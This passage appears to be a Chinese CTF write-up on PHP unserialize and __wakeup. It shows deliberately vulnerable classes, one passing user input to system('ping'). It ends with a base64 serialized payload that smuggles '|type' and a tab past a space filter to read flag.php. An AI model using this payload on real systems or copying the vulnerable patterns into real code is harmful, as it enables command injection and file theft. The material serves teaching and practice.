__wakeup(),执行unserialize()时,先会调用这个函数。
- class c1
- {
- private $argv;
- private $method;
-
- function __construct($argv,$method)
- {
- $this->argv=$argv;
- $this->method=$method;
-
- }
-
- public function f1()
- {
- echo "f1";
- }
-
-
- function __wakeup()
- {
-
- $this->f1();
-
- }
-
-
- }
-
- $c1= new c1('123','GET');
- $b = serialize($c1);
- echo $b;
- $str= $_GET['str'];
- unserialize($str);
2.CTF考题
index.php 读取目录flag.php
- class home{
-
- private $method;
- private $args;
- function __construct($method, $args) {
- $this->method = $method;
- $this->args = $args;
- }
-
- function __destruct(){
- if (in_array($this->method, array("ping"))) {
- call_user_func_array(array($this, $this->method), $this->args);
- }
- }
-
- function ping($host){
- system("ping -c 2 $host");
- }
- function waf($str){
- $str=str_replace(' ','',$str);
- return $str;
- }
-
- function __wakeup(){
- foreach($this->args as $k => $v) {
- $this->args[$k] = $this->waf(trim(addslashes($v)));
-
- }
- }
- }
- $a=@$_GET['a'];
-
- unserialize(base64_decode($a));
解题思路
unserialize 反序列化的时候会优先调用__wakeup() 进行空格过滤 $this->waf 调用waf函数把空格过滤是空。
首先构造序列化 base64
Tzo0OiJob21lIjoyOntzOjEyOiIAaG9tZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGhvbWUAYXJncyI7YToxOntpOjA7czo2NzoiMTI3LjAuMC4xfHR5cGUJRDpccGhwc3R1ZHlfcHJvXFdXV1x3d3cudGVzdDEuY29tXGN0ZlxkZW1vNVxmbGFnLnBocCI7fX0=